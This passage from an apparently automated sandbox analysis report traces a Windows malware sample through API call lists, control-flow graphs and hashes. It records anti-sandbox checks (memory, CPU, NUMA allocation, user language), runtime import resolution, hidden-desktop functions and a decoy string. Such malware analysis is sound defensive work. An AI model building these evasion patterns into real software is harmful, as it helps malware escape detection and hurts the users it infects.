                          • GetProcAddress.KERNEL32(74DD0000,01245730), ref: 007F653E
                          • GetProcAddress.KERNEL32(74DD0000,012524A0), ref: 007F6556
                          • GetProcAddress.KERNEL32(74DD0000,01252440), ref: 007F656F
                          • GetProcAddress.KERNEL32(74DD0000,012459F0), ref: 007F6587
                          • GetProcAddress.KERNEL32(74DD0000,01252500), ref: 007F659F
                          • GetProcAddress.KERNEL32(74DD0000,01245790), ref: 007F65B8
                          • LoadLibraryA.KERNEL32(01252518,?,?,?,007F1C03), ref: 007F65C9
                          • LoadLibraryA.KERNEL32(01252578,?,?,?,007F1C03), ref: 007F65DB
                          • LoadLibraryA.KERNEL32(01252530,?,?,?,007F1C03), ref: 007F65ED
                          • LoadLibraryA.KERNEL32(012525A8,?,?,?,007F1C03), ref: 007F65FE
                          • LoadLibraryA.KERNEL32(012525C0,?,?,?,007F1C03), ref: 007F6610
                          • GetProcAddress.KERNEL32(75A70000,01252560), ref: 007F662D
                          • GetProcAddress.KERNEL32(75290000,01252590), ref: 007F6649
                          • GetProcAddress.KERNEL32(75290000,012525D8), ref: 007F6661
                          • GetProcAddress.KERNEL32(75BD0000,01252548), ref: 007F667D
                          • GetProcAddress.KERNEL32(75450000,01245750), ref: 007F6699
                          • GetProcAddress.KERNEL32(76E90000,01258F18), ref: 007F66B5
                          • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 007F66CC
                          Strings
                          • NtQueryInformationProcess, xrefs: 007F66C1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: NtQueryInformationProcess
                          • API String ID: 2238633743-2781105232
                          • Opcode ID: 49c579d8de8c87e393e6c4d7d0249496ad118a26b7291e4082b39a09bd8539af
                          • Instruction ID: 07fa090d5b7a318bc1a09c74cdd99641ee629215e48f3f309e4e9d3ec310e9d2
                          • Opcode Fuzzy Hash: 49c579d8de8c87e393e6c4d7d0249496ad118a26b7291e4082b39a09bd8539af
                          • Instruction Fuzzy Hash: 8FA16CB5A112089FD754DFE4EC98A273BB9F7887403008519E996C3366DB78A843DF68

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2141 7f1bf0-7f1c0b call 7d2a90 call 7f6390 2146 7f1c0d 2141->2146 2147 7f1c1a-7f1c27 call 7d2930 2141->2147 2148 7f1c10-7f1c18 2146->2148 2151 7f1c29-7f1c2f lstrcpy 2147->2151 2152 7f1c35-7f1c63 2147->2152 2148->2147 2148->2148 2151->2152 2156 7f1c6d-7f1c7b GetSystemInfo 2152->2156 2157 7f1c65-7f1c67 ExitProcess 2152->2157 2158 7f1c7d-7f1c7f ExitProcess 2156->2158 2159 7f1c85-7f1ca0 call 7d1030 call 7d10c0 GetUserDefaultLangID 2156->2159 2164 7f1cb8-7f1cca call 7f2ad0 call 7f3e10 2159->2164 2165 7f1ca2-7f1ca9 2159->2165 2171 7f1ccc-7f1cde call 7f2a40 call 7f3e10 2164->2171 2172 7f1ce7-7f1d06 lstrlen call 7d2930 2164->2172 2165->2164 2166 7f1cb0-7f1cb2 ExitProcess 2165->2166 2171->2172 2185 7f1ce0-7f1ce1 ExitProcess 2171->2185 2178 7f1d08-7f1d0d 2172->2178 2179 7f1d23-7f1d40 lstrlen call 7d2930 2172->2179 2178->2179 2180 7f1d0f-7f1d11 2178->2180 2186 7f1d5a-7f1d7b call 7f2ad0 lstrlen call 7d2930 2179->2186 2187 7f1d42-7f1d44 2179->2187 2180->2179 2183 7f1d13-7f1d1d lstrcpy lstrcat 2180->2183 2183->2179 2193 7f1d7d-7f1d7f 2186->2193 2194 7f1d9a-7f1db4 lstrlen call 7d2930 2186->2194 2187->2186 2188 7f1d46-7f1d54 lstrcpy lstrcat 2187->2188 2188->2186 2193->2194 2196 7f1d81-7f1d85 2193->2196 2199 7f1dce-7f1deb call 7f2a40 lstrlen call 7d2930 2194->2199 2200 7f1db6-7f1db8 2194->2200 2196->2194 2198 7f1d87-7f1d94 lstrcpy lstrcat 2196->2198 2198->2194 2206 7f1ded-7f1def 2199->2206 2207 7f1e0a-7f1e0f 2199->2207 2200->2199 2201 7f1dba-7f1dc8 lstrcpy lstrcat 2200->2201 2201->2199 2206->2207 2208 7f1df1-7f1df5 2206->2208 2209 7f1e16-7f1e22 call 7d2930 2207->2209 2210 7f1e11 call 7d2a20 2207->2210 2208->2207 2212 7f1df7-7f1e04 lstrcpy lstrcat 2208->2212 2215 7f1e24-7f1e26 2209->2215 2216 7f1e30-7f1e66 call 7d2a20 * 5 OpenEventA 2209->2216 2210->2209 2212->2207 2215->2216 2217 7f1e28-7f1e2a lstrcpy 2215->2217 2228 7f1e8c-7f1ea0 CreateEventA call 7f1b20 call 7effd0 2216->2228 2229 7f1e68-7f1e8a CloseHandle Sleep OpenEventA 2216->2229 2217->2216 2233 7f1ea5-7f1eae CloseHandle ExitProcess 2228->2233 2229->2228 2229->2229
                          APIs
                            • Part of subcall function 007F6390: GetProcAddress.KERNEL32(74DD0000,01252218), ref: 007F63E9
                            • Part of subcall function 007F6390: GetProcAddress.KERNEL32(74DD0000,01252320), ref: 007F6402
                            • Part of subcall function 007F6390: GetProcAddress.KERNEL32(74DD0000,01252380), ref: 007F641A
                            • Part of subcall function 007F6390: GetProcAddress.KERNEL32(74DD0000,01252338), ref: 007F6432
                            • Part of subcall function 007F6390: GetProcAddress.KERNEL32(74DD0000,01258F08), ref: 007F644B
                            • Part of subcall function 007F6390: GetProcAddress.KERNEL32(74DD0000,01245970), ref: 007F6463
                            • Part of subcall function 007F6390: GetProcAddress.KERNEL32(74DD0000,01245710), ref: 007F647B
                            • Part of subcall function 007F6390: GetProcAddress.KERNEL32(74DD0000,01252488), ref: 007F6494
                            • Part of subcall function 007F6390: GetProcAddress.KERNEL32(74DD0000,01252398), ref: 007F64AC
                            • Part of subcall function 007F6390: GetProcAddress.KERNEL32(74DD0000,012523F8), ref: 007F64C4
                            • Part of subcall function 007F6390: GetProcAddress.KERNEL32(74DD0000,012523B0), ref: 007F64DD
                            • Part of subcall function 007F6390: GetProcAddress.KERNEL32(74DD0000,01245990), ref: 007F64F5
                            • Part of subcall function 007F6390: GetProcAddress.KERNEL32(74DD0000,012523C8), ref: 007F650D
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007F1C2F
                          • ExitProcess.KERNEL32 ref: 007F1C67
                          • GetSystemInfo.KERNEL32(?), ref: 007F1C71
                          • ExitProcess.KERNEL32 ref: 007F1C7F
                            • Part of subcall function 007D1030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 007D1046
                            • Part of subcall function 007D1030: VirtualAllocExNuma.KERNEL32(00000000), ref: 007D104D
                            • Part of subcall function 007D1030: ExitProcess.KERNEL32 ref: 007D1058
                            • Part of subcall function 007D10C0: GlobalMemoryStatusEx.KERNEL32 ref: 007D10EA
                            • Part of subcall function 007D10C0: ExitProcess.KERNEL32 ref: 007D1114
                          • GetUserDefaultLangID.KERNEL32 ref: 007F1C8F
                          • ExitProcess.KERNEL32 ref: 007F1CB2
                          • ExitProcess.KERNEL32 ref: 007F1CE1
                          • lstrlen.KERNEL32(01259038), ref: 007F1CEE
                          • lstrcpy.KERNEL32(00000000,?), ref: 007F1D15
                          • lstrcat.KERNEL32(00000000,01259038), ref: 007F1D1D
                          • lstrlen.KERNEL32(00804B98), ref: 007F1D28
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007F1D48
                          • lstrcat.KERNEL32(00000000,00804B98), ref: 007F1D54
                          • lstrlen.KERNEL32(00000000), ref: 007F1D63
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007F1D89
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007F1D94
                          • lstrlen.KERNEL32(00804B98), ref: 007F1D9F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007F1DBC
                          • lstrcat.KERNEL32(00000000,00804B98), ref: 007F1DC8
                          • lstrlen.KERNEL32(00000000), ref: 007F1DD7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007F1DF9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007F1E04
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                          • String ID:
                          • API String ID: 3366406952-0
                          • Opcode ID: 938ee12b901ef1d50c093527dc77add5ac3b2119f8672fdaf24bc8344e2c9478
                          • Instruction ID: 25448cadf32dc462d04197a52ce6da25bf6ee822dfad1186c8d4ac7386e47907
                          • Opcode Fuzzy Hash: 938ee12b901ef1d50c093527dc77add5ac3b2119f8672fdaf24bc8344e2c9478
                          • Instruction Fuzzy Hash: C1713D3164121EEBD721EBF09C4DB7F7AB9AF55701F444015FA46A62A2DB7C9803CB60

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2850 7d4a60-7d4afc RtlAllocateHeap 2867 7d4afe-7d4b03 2850->2867 2868 7d4b7a-7d4bbe VirtualProtect 2850->2868 2869 7d4b06-7d4b78 2867->2869 2869->2868
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000), ref: 007D4AA2
                          • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 007D4BB0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeapProtectVirtual
                          • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                          • API String ID: 1542196881-3329630956
                          • Opcode ID: fe76ea2f440519ff618fdb1d9fe9a2a28bffeb3a5c3ae00448bb7aa834eacfb8
                          • Instruction ID: d79f51ca86ac46a357b4c75143804db7aea6c786ea814e6276d2b3c01b1305f5
                          • Opcode Fuzzy Hash: fe76ea2f440519ff618fdb1d9fe9a2a28bffeb3a5c3ae00448bb7aa834eacfb8
                          • Instruction Fuzzy Hash: 6831E795BC021C76D660FBEF4C47F5F6E55FF86760B0160667628D33D0C9A95420CAA2
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 007F2A6F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 007F2A76
                          • GetUserNameA.ADVAPI32(00000000,00000104), ref: 007F2A8A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateNameProcessUser
                          • String ID:
                          • API String ID: 1296208442-0
                          • Opcode ID: 8af0c90478f8549c5d5fa6046a7491128e4cbd1ee0c93442f7330cc7d515eee3
                          • Instruction ID: 3ca05b75bf239e873a0025d9fd1e74ab1d872cd3f55aa9d5b36826df3e77af19
                          • Opcode Fuzzy Hash: 8af0c90478f8549c5d5fa6046a7491128e4cbd1ee0c93442f7330cc7d515eee3
                          • Instruction Fuzzy Hash: 79F0B4B1A40608ABC700DF98DD49B9FBBBCFB04B21F000216FA15E3780D7B8190586A1

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 633 7f66e0-7f66e7 634 7f6afe-7f6b92 LoadLibraryA * 8 633->634 635 7f66ed-7f6af9 GetProcAddress * 43 633->635 636 7f6c08-7f6c0f 634->636 637 7f6b94-7f6c03 GetProcAddress * 5 634->637 635->634 638 7f6c15-7f6ccd GetProcAddress * 8 636->638 639 7f6cd2-7f6cd9 636->639 637->636 638->639 640 7f6d4f-7f6d56 639->640 641 7f6cdb-7f6d4a GetProcAddress * 5 639->641 642 7f6d5c-7f6de4 GetProcAddress * 6 640->642 643 7f6de9-7f6df0 640->643 641->640 642->643 644 7f6df6-7f6f0b GetProcAddress * 12 643->644 645 7f6f10-7f6f17 643->645 644->645 646 7f6f8d-7f6f94 645->646 647 7f6f19-7f6f88 GetProcAddress * 5 645->647 648 7f6f96-7f6fbc GetProcAddress * 2 646->648 649 7f6fc1-7f6fc8 646->649 647->646 648->649 650 7f6fca-7f6ff0 GetProcAddress * 2 649->650 651 7f6ff5-7f6ffc 649->651 650->651 652 7f70ed-7f70f4 651->652 653 7f7002-7f70e8 GetProcAddress * 10 651->653 654 7f70f6-7f714d GetProcAddress * 4 652->654 655 7f7152-7f7159 652->655 653->652 654->655 656 7f716e-7f7175 655->656 657 7f715b-7f7169 GetProcAddress 655->657 658 7f7177-7f71ce GetProcAddress * 4 656->658 659 7f71d3 656->659 657->656 658->659
                          APIs
                          • GetProcAddress.KERNEL32(74DD0000,012457F0), ref: 007F66F5
                          • GetProcAddress.KERNEL32(74DD0000,012456D0), ref: 007F670D
                          • GetProcAddress.KERNEL32(74DD0000,012596D0), ref: 007F6726
                          • GetProcAddress.KERNEL32(74DD0000,01259670), ref: 007F673E
                          • GetProcAddress.KERNEL32(74DD0000,01259688), ref: 007F6756
                          • GetProcAddress.KERNEL32(74DD0000,012596A0), ref: 007F676F
                          • GetProcAddress.KERNEL32(74DD0000,0124B680), ref: 007F6787
                          • GetProcAddress.KERNEL32(74DD0000,0125D100), ref: 007F679F
                          • GetProcAddress.KERNEL32(74DD0000,0125CFF8), ref: 007F67B8
                          • GetProcAddress.KERNEL32(74DD0000,0125D028), ref: 007F67D0
                          • GetProcAddress.KERNEL32(74DD0000,0125CFC8), ref: 007F67E8
                          • GetProcAddress.KERNEL32(74DD0000,01245930), ref: 007F6801
                          • GetProcAddress.KERNEL32(74DD0000,01245810), ref: 007F6819
                          • GetProcAddress.KERNEL32(74DD0000,01245950), ref: 007F6831
                          • GetProcAddress.KERNEL32(74DD0000,01245870), ref: 007F684A
                          • GetProcAddress.KERNEL32(74DD0000,0125CFE0), ref: 007F6862
                          • GetProcAddress.KERNEL32(74DD0000,0125D0B8), ref: 007F687A
                          • GetProcAddress.KERNEL32(74DD0000,0124B7E8), ref: 007F6893
                          • GetProcAddress.KERNEL32(74DD0000,01245A70), ref: 007F68AB
                          • GetProcAddress.KERNEL32(74DD0000,0125D058), ref: 007F68C3
                          • GetProcAddress.KERNEL32(74DD0000,0125CF20), ref: 007F68DC
                          • GetProcAddress.KERNEL32(74DD0000,0125D118), ref: 007F68F4
                          • GetProcAddress.KERNEL32(74DD0000,0125CF80), ref: 007F690C
                          • GetProcAddress.KERNEL32(74DD0000,01245830), ref: 007F6925
                          • GetProcAddress.KERNEL32(74DD0000,0125D0D0), ref: 007F693D
                          • GetProcAddress.KERNEL32(74DD0000,0125CF50), ref: 007F6955
                          • GetProcAddress.KERNEL32(74DD0000,0125CF68), ref: 007F696E
                          • GetProcAddress.KERNEL32(74DD0000,0125D148), ref: 007F6986
                          • GetProcAddress.KERNEL32(74DD0000,0125CF98), ref: 007F699E
                          • GetProcAddress.KERNEL32(74DD0000,0125D070), ref: 007F69B7
                          • GetProcAddress.KERNEL32(74DD0000,0125CFB0), ref: 007F69CF
                          • GetProcAddress.KERNEL32(74DD0000,0125D010), ref: 007F69E7
                          • GetProcAddress.KERNEL32(74DD0000,0125D1A8), ref: 007F6A00
                          • GetProcAddress.KERNEL32(74DD0000,0125A6B0), ref: 007F6A18
                          • GetProcAddress.KERNEL32(74DD0000,0125D1C0), ref: 007F6A30
                          • GetProcAddress.KERNEL32(74DD0000,0125D040), ref: 007F6A49
                          • GetProcAddress.KERNEL32(74DD0000,012458B0), ref: 007F6A61
                          • GetProcAddress.KERNEL32(74DD0000,0125D088), ref: 007F6A79
                          • GetProcAddress.KERNEL32(74DD0000,01245A30), ref: 007F6A92
                          • GetProcAddress.KERNEL32(74DD0000,0125D0A0), ref: 007F6AAA
                          • GetProcAddress.KERNEL32(74DD0000,0125D0E8), ref: 007F6AC2
                          • GetProcAddress.KERNEL32(74DD0000,01245A50), ref: 007F6ADB
                          • GetProcAddress.KERNEL32(74DD0000,01245B50), ref: 007F6AF3
                          • LoadLibraryA.KERNEL32(0125D130,007F051F), ref: 007F6B05
                          • LoadLibraryA.KERNEL32(0125D160), ref: 007F6B16
                          • LoadLibraryA.KERNEL32(0125D178), ref: 007F6B28
                          • LoadLibraryA.KERNEL32(0125D190), ref: 007F6B3A
                          • LoadLibraryA.KERNEL32(0125CF38), ref: 007F6B4B
                          • LoadLibraryA.KERNEL32(0125D1D8), ref: 007F6B5D
                          • LoadLibraryA.KERNEL32(0125D1F0), ref: 007F6B6F
                          • LoadLibraryA.KERNEL32(0125CF08), ref: 007F6B80
                          • GetProcAddress.KERNEL32(75290000,01245AF0), ref: 007F6B9C
                          • GetProcAddress.KERNEL32(75290000,0125D3A0), ref: 007F6BB4
                          • GetProcAddress.KERNEL32(75290000,01258FE8), ref: 007F6BCD
                          • GetProcAddress.KERNEL32(75290000,0125D430), ref: 007F6BE5
                          • GetProcAddress.KERNEL32(75290000,01245D10), ref: 007F6BFD
                          • GetProcAddress.KERNEL32(73B50000,0124B5E0), ref: 007F6C1D
                          • GetProcAddress.KERNEL32(73B50000,01245AD0), ref: 007F6C35
                          • GetProcAddress.KERNEL32(73B50000,0124B810), ref: 007F6C4E
                          • GetProcAddress.KERNEL32(73B50000,0125D478), ref: 007F6C66
                          • GetProcAddress.KERNEL32(73B50000,0125D4F0), ref: 007F6C7E
                          • GetProcAddress.KERNEL32(73B50000,01245C70), ref: 007F6C97
                          • GetProcAddress.KERNEL32(73B50000,01245BF0), ref: 007F6CAF
                          • GetProcAddress.KERNEL32(73B50000,0125D298), ref: 007F6CC7
                          • GetProcAddress.KERNEL32(752C0000,01245AB0), ref: 007F6CE3
                          • GetProcAddress.KERNEL32(752C0000,01245D30), ref: 007F6CFB
                          • GetProcAddress.KERNEL32(752C0000,0125D490), ref: 007F6D14
                          • GetProcAddress.KERNEL32(752C0000,0125D208), ref: 007F6D2C
                          • GetProcAddress.KERNEL32(752C0000,01245C30), ref: 007F6D44
                          • GetProcAddress.KERNEL32(74EC0000,0124B6A8), ref: 007F6D64
                          • GetProcAddress.KERNEL32(74EC0000,0124B900), ref: 007F6D7C
                          • GetProcAddress.KERNEL32(74EC0000,0125D250), ref: 007F6D95
                          • GetProcAddress.KERNEL32(74EC0000,01245C10), ref: 007F6DAD
                          • GetProcAddress.KERNEL32(74EC0000,01245D50), ref: 007F6DC5
                          • GetProcAddress.KERNEL32(74EC0000,0124B6F8), ref: 007F6DDE
                          • GetProcAddress.KERNEL32(75BD0000,0125D4A8), ref: 007F6DFE
                          • GetProcAddress.KERNEL32(75BD0000,01245BD0), ref: 007F6E16
                          • GetProcAddress.KERNEL32(75BD0000,01258FC8), ref: 007F6E2F
                          • GetProcAddress.KERNEL32(75BD0000,0125D3B8), ref: 007F6E47
                          • GetProcAddress.KERNEL32(75BD0000,0125D238), ref: 007F6E5F
                          • GetProcAddress.KERNEL32(75BD0000,01245C50), ref: 007F6E78
                          • GetProcAddress.KERNEL32(75BD0000,01245C90), ref: 007F6E90
                          • GetProcAddress.KERNEL32(75BD0000,0125D310), ref: 007F6EA8
                          • GetProcAddress.KERNEL32(75BD0000,0125D4C0), ref: 007F6EC1
                          • GetProcAddress.KERNEL32(75BD0000,CreateDesktopA), ref: 007F6ED7
                          • GetProcAddress.KERNEL32(75BD0000,OpenDesktopA), ref: 007F6EEE
                          • GetProcAddress.KERNEL32(75BD0000,CloseDesktop), ref: 007F6F05
                          • GetProcAddress.KERNEL32(75A70000,01245DF0), ref: 007F6F21
                          • GetProcAddress.KERNEL32(75A70000,0125D4D8), ref: 007F6F39
                          • GetProcAddress.KERNEL32(75A70000,0125D460), ref: 007F6F52
                          • GetProcAddress.KERNEL32(75A70000,0125D220), ref: 007F6F6A
                          • GetProcAddress.KERNEL32(75A70000,0125D268), ref: 007F6F82
                          • GetProcAddress.KERNEL32(75450000,01245CB0), ref: 007F6F9E
                          • GetProcAddress.KERNEL32(75450000,01245D90), ref: 007F6FB6
                          • GetProcAddress.KERNEL32(75DA0000,01245B70), ref: 007F6FD2
                          • GetProcAddress.KERNEL32(75DA0000,0125D448), ref: 007F6FEA
                          • GetProcAddress.KERNEL32(6F070000,01245B90), ref: 007F700A
                          • GetProcAddress.KERNEL32(6F070000,01245CD0), ref: 007F7022
                          • GetProcAddress.KERNEL32(6F070000,01245BB0), ref: 007F703B
                          • GetProcAddress.KERNEL32(6F070000,0125D280), ref: 007F7053
                          • GetProcAddress.KERNEL32(6F070000,01245CF0), ref: 007F706B
                          • GetProcAddress.KERNEL32(6F070000,01245B10), ref: 007F7084
                          • GetProcAddress.KERNEL32(6F070000,01245E10), ref: 007F709C
                          • GetProcAddress.KERNEL32(6F070000,01245E30), ref: 007F70B4
                          • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 007F70CB
                          • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 007F70E2
                          • GetProcAddress.KERNEL32(75AF0000,0125D340), ref: 007F70FE
                          • GetProcAddress.KERNEL32(75AF0000,01258FF8), ref: 007F7116
                          • GetProcAddress.KERNEL32(75AF0000,0125D3E8), ref: 007F712F
                          • GetProcAddress.KERNEL32(75AF0000,0125D2C8), ref: 007F7147
                          • GetProcAddress.KERNEL32(75D90000,01245E50), ref: 007F7163
                          • GetProcAddress.KERNEL32(6E440000,0125D2B0), ref: 007F717F
                          • GetProcAddress.KERNEL32(6E440000,01245B30), ref: 007F7197
                          • GetProcAddress.KERNEL32(6E440000,0125D358), ref: 007F71B0
                          • GetProcAddress.KERNEL32(6E440000,0125D2E0), ref: 007F71C8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
